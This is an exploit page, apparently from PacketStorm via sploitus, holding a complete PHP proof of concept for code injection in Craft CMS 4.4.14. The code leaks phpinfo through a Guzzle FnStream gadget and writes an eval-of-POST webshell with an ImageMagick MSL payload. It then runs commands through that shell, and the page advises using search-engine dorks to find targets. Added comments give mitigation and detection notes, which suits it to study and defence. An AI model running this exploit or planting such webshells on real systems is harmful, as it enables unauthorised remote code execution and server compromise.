## https://sploitus.com/exploit?id=PACKETSTORM:182148
=============================================================================================================================================  
| # Title : Craft CMS 4.4.14 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://craftcms.com/ |  
=============================================================================================================================================  
  
POC:  
  
[+] Dorking in Google or another search engine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 116: set your target.  
  
[+] Save the code as poc.php.  
  
[+] Usage: cmd => c:\www\test\php poc.php  
  
[+] Payload:  
  
<?php  
/**
 * Proof-of-concept client for the Craft CMS 4.x object-injection issue reached through the
 * `conditions/render` controller action (no CVE number or fixed version is given on this page).
 *
 * What the visible code does: every request is a POST to $target_uri whose body carries
 * `action=conditions/render`, a `configObject[class]` field and a JSON `config` field. The JSON
 * uses the `as ` and `__construct()` keys, which appear to be Yii's behavior-attach and
 * constructor-argument keys, so the application ends up instantiating a request-chosen class
 * with request-chosen arguments. check_phpinfo() instantiates GuzzleHttp\Psr7\FnStream with its
 * `close` callback bound to phpinfo; upload_webshell() instantiates Imagick with an MSL file
 * source and then uses that to write a PHP file under DOCUMENT_ROOT.
 *
 * NOTE(review) — defender notes:
 *  - Mitigation: upgrade Craft CMS to a release in which this issue is fixed; until then,
 *    block or rate-limit unauthenticated POSTs carrying `action=conditions/render`.
 *  - Detection: web-server/WAF logs showing `configObject[class]` together with a `config`
 *    value containing `"as "` or `"__construct()"`; phpinfo() markup in a response body;
 *    new `.php` files appearing under DOCUMENT_ROOT; ImageMagick being driven by the MSL coder.
 *  - Hardening: an ImageMagick policy that disables the MSL coder, and listing phpinfo in
 *    PHP's `disable_functions`, each remove one stage of this chain.
 */
class CraftCMSExploit {  
private $target_uri;  // base URL of the Craft CMS instance; every request is POSTed here
private $webshell;  // file name written under document_root by upload_webshell()
private $config = ['upload_tmp_dir' => null, 'document_root' => null];  // filled by parsePHPInfo() from phpinfo() HTML
private $post_param;  // form field name the written PHP file reads its command from
private $get_param;  // generated in the constructor but not referenced by any method in this class
  
/**
 * @param string $target_uri base URL of the target
 * @param string $webshell   optional file name; when empty (any falsy value) a random
 *                           8-16 letter name with a `.php` suffix is generated instead
 */
public function __construct($target_uri, $webshell = '') {  
$this->target_uri = $target_uri;  
$this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';  
$this->post_param = $this->generateRandomString(1, 8);  
$this->get_param = $this->generateRandomString(1, 8);  
}  
  
/**
 * Stage 1: POSTs the FnStream/phpinfo configuration and, if a body came back, hands it to
 * parsePHPInfo(). Returns nothing; results land in $this->config.
 * The `config` JSON binds FnStream's `close` method to phpinfo, so the phpinfo() output is
 * expected to appear inside the HTTP response body.
 */
public function check_phpinfo() {  
// Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()  
$data = http_build_query([  
'action' => 'conditions/render',  
'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',  
'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'  
]);  
  
$response = $this->sendPostRequest($this->target_uri, $data);  
// file_get_contents() returns false on failure; an empty body is skipped the same way
if ($response) {  
$this->parsePHPInfo($response);  
}  
}  
  
/**
 * Scrapes upload_tmp_dir and DOCUMENT_ROOT out of phpinfo() HTML.
 * Both patterns are case-insensitive and greedy with no `s` flag, so each must match within a
 * single line of the HTML. An upload_tmp_dir of "no value" is mapped to /tmp (loose `==`).
 * A non-matching pattern leaves the corresponding entry null; the other methods do not check
 * for that. $this->config['upload_tmp_dir'] is never read elsewhere in this class.
 *
 * @param string $response phpinfo() HTML
 */
private function parsePHPInfo($response) {  
// Parses the phpinfo() HTML response to find upload_tmp_dir and document_root  
if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {  
$this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);  
}  
if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {  
$this->config['document_root'] = trim($matches[1]);  
}  
}  
  
/**
 * Stage 2: builds an ImageMagick MSL document whose <read> uses a `caption:` pseudo-image
 * containing PHP source and whose <write> targets `info:<document_root>/<webshell>`, then
 * POSTs it as multipart form data next to the Imagick configuration. The file written is a
 * one-line eval()-of-POST-parameter backdoor — the on-disk artefact a responder should look for.
 *
 * @return bool true when the response body contains the substring '502'; the author
 *              presumably treats an upstream 502 as the sign the object was constructed.
 *              This does not verify that the file actually exists.
 */
public function upload_webshell() {  
// Generates an XML payload to upload the webshell via Imagick MSL  
$payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>  
<image>  
<read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />  
<write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />  
</image>";  
  
$form_data = [  
'action' => 'conditions/render',  
'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',  
'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',  
'payload' => $payload  
];  
  
$response = $this->sendMultipartPostRequest($this->target_uri, $form_data);  
return strpos($response, '502') !== false;  
}  
  
/**
 * Stage 3: base64-encodes $cmd and POSTs it under $this->post_param to
 * <target_uri>/<webshell>, where the file written in stage 2 decodes and eval()s it.
 *
 * @param string $cmd
 * @return string|false raw response body, or false when file_get_contents() fails
 */
public function execute_command($cmd) {  
// Executes a command on the server via the uploaded webshell  
$payload = base64_encode($cmd);  
$data = http_build_query([$this->post_param => $payload]);  
  
return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);  
}  
  
/**
 * URL-encoded POST via PHP's http stream wrapper (not cURL, despite the advisory text).
 * Failures surface as PHP warnings and a false return rather than exceptions; timeouts,
 * redirects and TLS verification are whatever the wrapper defaults are.
 *
 * @param string $uri
 * @param string $data already url-encoded body
 * @return string|false
 */
private function sendPostRequest($uri, $data) {  
$options = [  
'http' => [  
'header' => "Content-type: application/x-www-form-urlencoded\r\n",  
'method' => 'POST',  
'content' => $data,  
],  
];  
$context = stream_context_create($options);  
return file_get_contents($uri, false, $context);  
}  
  
/**
 * Multipart POST via the http stream wrapper. The boundary is a uniqid() and the body is
 * assembled by buildMultipartData(); same failure semantics as sendPostRequest().
 *
 * @param string                $uri
 * @param array<string, string> $data field name => field value
 * @return string|false
 */
private function sendMultipartPostRequest($uri, $data) {  
// Sends a multipart form-data POST request  
$boundary = uniqid();  
$delimiter = '------' . $boundary;  
  
$post_data = $this->buildMultipartData($data, $delimiter);  
  
$options = [  
'http' => [  
'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",  
'method' => 'POST',  
'content' => $post_data,  
],  
];  
  
$context = stream_context_create($options);  
return file_get_contents($uri, false, $context);  
}  
  
/**
 * Serialises an associative array into multipart/form-data text parts (one per key, no
 * filename or Content-Type, CRLF line endings) terminated by "--$delimiter--".
 * Names and values are interpolated verbatim — quotes and CRLF inside them are not escaped.
 *
 * @param array<string, string> $data
 * @param string                $delimiter boundary string used between parts
 * @return string
 */
private function buildMultipartData($data, $delimiter) {  
$post_data = '';  
foreach ($data as $name => $content) {  
$post_data .= "--$delimiter\r\n";  
$post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";  
$post_data .= "$content\r\n";  
}  
$post_data .= "--$delimiter--\r\n";  
return $post_data;  
}  
  
/**
 * Returns between $min and $max characters taken from the front of a shuffled ASCII alphabet.
 * rand()/str_shuffle() are not cryptographically secure, and because the alphabet is shuffled
 * rather than sampled with replacement the result never repeats a letter (max 52 characters).
 * Fine for the throwaway file and field names used here; not suitable for anything secret.
 *
 * @param int $min
 * @param int $max
 * @return string
 */
private function generateRandomString($min, $max) {  
$length = rand($min, $max);  
return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);  
}  
}  
  
// Usage — 'http://target-craftcms.com' is the author's placeholder. Counting from the
// `<?php` line, this constructor call is line 116 of poc.php, the line the header refers to.
// The three stages run in order: scrape document_root from phpinfo(), write the PHP file,
// then run `whoami` through it. The response is echoed unescaped, and upload_webshell()'s
// result is only the '502' substring heuristic, not a confirmation that the file exists.
$exploit = new CraftCMSExploit('http://target-craftcms.com');  
$exploit->check_phpinfo();  
if ($exploit->upload_webshell()) {  
echo $exploit->execute_command('whoami');  
}  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================